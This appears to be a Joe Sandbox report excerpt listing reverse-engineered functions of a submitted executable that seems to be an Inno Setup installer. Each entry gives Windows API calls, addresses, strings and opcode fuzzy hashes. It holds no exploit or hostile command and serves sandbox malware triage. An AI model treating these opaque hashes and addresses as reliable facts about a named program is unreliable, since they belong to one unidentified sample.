                                                                              • Instruction Fuzzy Hash: 85F037616447007BD610E6B58C81E6B73DCEF44754F04893A7E94C72C1D678D8089726
                                                                              APIs
                                                                              • GetLastActivePopup.USER32(?), ref: 0042424C
                                                                              • IsWindowVisible.USER32(?), ref: 0042425D
                                                                              • IsWindowEnabled.USER32(?), ref: 00424267
                                                                              • SetForegroundWindow.USER32(?), ref: 00424271
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                              • String ID:
                                                                              • API String ID: 2280970139-0
                                                                              • Opcode ID: f5eb756bdd9929eb0187d31ee3fb53ef02cbc66ad04bc69917a7cf098bede398
                                                                              • Instruction ID: 2c5ff33fc315f6eb6fab431e1453bcb0e66c5aaaa6596e28cc8dc28fd0b03a53
                                                                              • Opcode Fuzzy Hash: f5eb756bdd9929eb0187d31ee3fb53ef02cbc66ad04bc69917a7cf098bede398
                                                                              • Instruction Fuzzy Hash: C7E0EC61B02672D6AE31FA7B2881A9F518C9D45BE434641EBBC04FB38ADB2CDC1141BD
                                                                              APIs
                                                                              • GlobalHandle.KERNEL32 ref: 0040626F
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00406276
                                                                              • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00406281
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Global$AllocHandleLockUnlock
                                                                              • String ID:
                                                                              • API String ID: 2167344118-0
                                                                              • Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                              • Instruction ID: 5df08fd8dc2b017785a639aa93036e57be915985ffe03f20f856cac12e18577c
                                                                              • Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                              • Instruction Fuzzy Hash: 0BB009C4810A01BEEC0473B24C0BE3F245CD88172C3904A6F3448BA183987C9C405A3A
                                                                              APIs
                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047B625,?,00000000,00000000,00000001,00000000,00479FD9,?,00000000), ref: 00479F9D
                                                                              Strings
                                                                              • Failed to parse "reg" constant, xrefs: 00479FA4
                                                                              • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 00479E11
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                              • API String ID: 3535843008-1938159461
                                                                              • Opcode ID: 16d8054e143327fe44f194470e69b7b3affe626307b8d2e4c87d8a967639857b
                                                                              • Instruction ID: 47cfa27444033e2517bbb80e4c41b37ce2323e10df06c4a21d1f595548a21c80
                                                                              • Opcode Fuzzy Hash: 16d8054e143327fe44f194470e69b7b3affe626307b8d2e4c87d8a967639857b
                                                                              • Instruction Fuzzy Hash: EB814F74E00108AFCB10EFA5D881ADEBBF9EF49314F50816AE814E7391D7389E45CB98
                                                                              APIs
                                                                              • GetForegroundWindow.USER32(00000000,004831FA,?,00000000,0048323B,?,?,?,?,00000000,00000000,00000000,?,0046BC0D), ref: 004830A9
                                                                              • SetActiveWindow.USER32(?,00000000,004831FA,?,00000000,0048323B,?,?,?,?,00000000,00000000,00000000,?,0046BC0D), ref: 004830BB
                                                                              Strings
                                                                              • Will not restart Windows automatically., xrefs: 004831DA
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ActiveForeground
                                                                              • String ID: Will not restart Windows automatically.
                                                                              • API String ID: 307657957-4169339592
                                                                              • Opcode ID: 5dc678ddc73231bd7f3deb4895ee9687ce670b7cd050f2935782a4b7fd108cc5
                                                                              • Instruction ID: 14d12ce259a9d91e5540598a1459cb212717435f7278461c6eeed3650d71e2e9
                                                                              • Opcode Fuzzy Hash: 5dc678ddc73231bd7f3deb4895ee9687ce670b7cd050f2935782a4b7fd108cc5
                                                                              • Instruction Fuzzy Hash: E7415530304280AEE701FF64DDAAB6DBBA0AB56F05F104CB7E8404B3A2C67D1A01DB5D
                                                                              Strings
                                                                              • Failed to proceed to next wizard page; aborting., xrefs: 0046CB98
                                                                              • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CBAC
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                              • API String ID: 0-1974262853
                                                                              • Opcode ID: 5c21498a53a12cfa8e7fd6d0fca4a53d4e4662c611673a7e38899ae354c5c1cd
                                                                              • Instruction ID: f767aec7694c3a706269651ece3f491ea64dc64c3ef09eb99a1787ebd09846f2
                                                                              • Opcode Fuzzy Hash: 5c21498a53a12cfa8e7fd6d0fca4a53d4e4662c611673a7e38899ae354c5c1cd
                                                                              • Instruction Fuzzy Hash: A7317230604204DFD711EB99D5C6BA977E5AB05704F5500BBE048AB392D778BE40CB5E
                                                                              APIs
                                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004836C7,?,00000001,?,?,004836C7,?,00000001,00000000), ref: 0042DE38
                                                                              • RegCloseKey.ADVAPI32(?,00478A9E,?,?,00000001,00000000,00000000,00478AB9), ref: 00478A87
                                                                              Strings
                                                                              • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478A12
                                                                              • %s\%s_is1, xrefs: 00478A30
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                              • API String ID: 47109696-1598650737
                                                                              • Opcode ID: cbbb33293de64dd8a9f9caa67a5b3cda024617d485473e40b666104571127f40
                                                                              • Instruction ID: dc80809357616fc60b3df9076f922e914a3229883baf2cade8178dd1eb90c67d
                                                                              • Opcode Fuzzy Hash: cbbb33293de64dd8a9f9caa67a5b3cda024617d485473e40b666104571127f40
                                                                              • Instruction Fuzzy Hash: C2218170B042446FDB01DFA9CC55ADEBBE8EB88304F90847BE508E7381DA789D01CB59
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501FD
                                                                              • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045022E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ExecuteMessageSendShell
                                                                              • String ID: open
                                                                              • API String ID: 812272486-2758837156
                                                                              • Opcode ID: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                              • Instruction ID: 7f57506e0c07b49dd0b520b237e7736b759e9f4ed638734fb0c833ac5abbff07
                                                                              • Opcode Fuzzy Hash: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                              • Instruction Fuzzy Hash: A1216074E00204AFDB10DFA9C896B9EBBF8EB44705F1081BAB404E7292D678DE45CA59
                                                                              APIs
                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 0045532C
                                                                              • GetLastError.KERNEL32(0000003C,00000000,00455375,?,?,?), ref: 0045533D
                                                                                • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryErrorExecuteLastShellSystem
                                                                              • String ID: <
                                                                              • API String ID: 893404051-4251816714
                                                                              • Opcode ID: eda88bca0edbb1d4d60b2465a169ef4fc32f774dfe42a6a5e367270b0e7eae9d
                                                                              • Instruction ID: 92df0b2f1231c5c49ece4c570041ef31d6ed92e86db86b93cafb864a5026e18c
                                                                              • Opcode Fuzzy Hash: eda88bca0edbb1d4d60b2465a169ef4fc32f774dfe42a6a5e367270b0e7eae9d
                                                                              • Instruction Fuzzy Hash: 172167B0600609ABDB10EF65C8926AE7BE8AF44355F54403AFC44E7291D7789E49CB98
                                                                              APIs
                                                                              • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                              • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                                • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,023AC268,00003D94,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,023AC268,00003D94,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,023AC268,00003D94,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,023AC268,00003D94,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                              • String ID: )
                                                                              • API String ID: 2227675388-1084416617
                                                                              • Opcode ID: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                              • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                                              • Opcode Fuzzy Hash: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                              • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                                              APIs
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 004966D9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window
                                                                              • String ID: /INITPROCWND=$%x $@
                                                                              • API String ID: 2353593579-4169826103
                                                                              • Opcode ID: b4f4c19a8bc55ff90c2e9b73843465f76c245e37ca3079c0cf601615490e7546
                                                                              • Instruction ID: 2823dcf8e8ddb1ccfa98fa5e384fb34ae0e14248cce506d77a4005fc3c11fa4c
                                                                              • Opcode Fuzzy Hash: b4f4c19a8bc55ff90c2e9b73843465f76c245e37ca3079c0cf601615490e7546
                                                                              • Instruction Fuzzy Hash: 4711A531A042089FDF01DFA4D851BAE7FE8EB48318F5144BBE504E7291DB7C9905C658
                                                                              APIs
                                                                                • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                              • SysFreeString.OLEAUT32(?), ref: 004474C6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: String$AllocByteCharFreeMultiWide
                                                                              • String ID: NIL Interface Exception$Unknown Method
                                                                              • API String ID: 3952431833-1023667238
                                                                              • Opcode ID: 4f43f2048f3271615f10b1acac82c539bd88d3f79065c454e3b767f871ffd8a8
                                                                              • Instruction ID: eb0132878ffe7144b3db707554455947565e11d0cdd4dc78092451a8fec87e99
                                                                              • Opcode Fuzzy Hash: 4f43f2048f3271615f10b1acac82c539bd88d3f79065c454e3b767f871ffd8a8
                                                                              • Instruction Fuzzy Hash: 8011B9706082089FEB10DFA58C52A6EBBBCEB09704F91407AF504F7681D77C9D01CB69
                                                                              APIs
                                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495FD8,?,00495FCC,00000000,00495FB3), ref: 00495F7E
                                                                              • CloseHandle.KERNEL32(00496018,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495FD8,?,00495FCC,00000000), ref: 00495F95
                                                                                • Part of subcall function 00495E68: GetLastError.KERNEL32(00000000,00495F00,?,?,?,?), ref: 00495E8C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateErrorHandleLastProcess
                                                                              • String ID: D
                                                                              • API String ID: 3798668922-2746444292
                                                                              • Opcode ID: 2cac3968973140c3bf288dcd51b8fea51afb9ccec72b099e887b62547fa5ce6a
                                                                              • Instruction ID: f27f12c2402a3b04c6ef5f500e2c30b4f6e8a0b8f5398e8f95c33b3eb070371b
                                                                              • Opcode Fuzzy Hash: 2cac3968973140c3bf288dcd51b8fea51afb9ccec72b099e887b62547fa5ce6a
                                                                              • Instruction Fuzzy Hash: FC015EB1644648AFDF05DBA2DD42E9EBBACDB08714F61003AF904E72C5D6789E048B68
                                                                              APIs
                                                                              • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD78
                                                                              • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Value$EnumQuery
                                                                              • String ID: Inno Setup: No Icons
                                                                              • API String ID: 1576479698-2016326496
                                                                              • Opcode ID: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                              • Instruction ID: 8d080c6700cf8453afd411d185ff7d2dd707f59376968ad674d2e7d16536e1ed
                                                                              • Opcode Fuzzy Hash: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                              • Instruction Fuzzy Hash: 1B012B33B55B7179FB3045256D01F7B57889B82B60F64013BF942EA2C0D6999C04936E
                                                                              APIs
                                                                                • Part of subcall function 004555E4: GetCurrentProcess.KERNEL32(00000028), ref: 004555F3
                                                                                • Part of subcall function 004555E4: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555F9
                                                                              • SetForegroundWindow.USER32(?), ref: 00497406
                                                                              Strings
                                                                              • Not restarting Windows because Uninstall is being run from the debugger., xrefs: 00497431
                                                                              • Restarting Windows., xrefs: 004973E3
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CurrentForegroundOpenTokenWindow
                                                                              • String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
                                                                              • API String ID: 3179053593-4147564754
                                                                              • Opcode ID: 4193847a8af397455179383c4cf3c5e93af51966d3aee1b0e62b09f4ca4c6cf6
                                                                              • Instruction ID: 81a48865aaf16d48f947dda4b05133a8651c2c420a775bb83d5095b98b759fde
                                                                              • Opcode Fuzzy Hash: 4193847a8af397455179383c4cf3c5e93af51966d3aee1b0e62b09f4ca4c6cf6
                                                                              • Instruction Fuzzy Hash: 1C01B5B0618244AAEB01FB66E992B983F989B44308F80407BF5446B2D3C73C994AC75D
                                                                              APIs
                                                                                • Part of subcall function 0047CBBC: FreeLibrary.KERNEL32(74610000,00481513), ref: 0047CBD2
                                                                                • Part of subcall function 0047C88C: GetTickCount.KERNEL32 ref: 0047C8D6
                                                                                • Part of subcall function 004570E0: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004570FF
                                                                              • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,004984CB), ref: 00497BC9
                                                                              • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,004984CB), ref: 00497BCF
                                                                              Strings
                                                                              • Detected restart. Removing temporary directory., xrefs: 00497B83
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                              • String ID: Detected restart. Removing temporary directory.
                                                                              • API String ID: 1717587489-3199836293
                                                                              • Opcode ID: edd495a3eb806bce708dfd09f75f47a0044e32d2cd5383a21bd3adb2a5963435
                                                                              • Instruction ID: d50bc6c630895905583a3a2fadab6dc9590d78cbbd3fad9bb3e23ee4b0713a5b
                                                                              • Opcode Fuzzy Hash: edd495a3eb806bce708dfd09f75f47a0044e32d2cd5383a21bd3adb2a5963435
                                                                              • Instruction Fuzzy Hash: C8E0E57221C7042EDA1177B7BC62A573F8CD74576C761447FF90881992C42D6810C67D
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastSleep
                                                                              • String ID:
                                                                              • API String ID: 1458359878-0
                                                                              • Opcode ID: 6f2b27bda8ca5cc9560dd93be1cc0b104f7b92667656e0278d509a2706482566
                                                                              • Instruction ID: f31041694d7e6b08a2ea33ec2b58b28b25921f40701f973673b956735a8b67d8
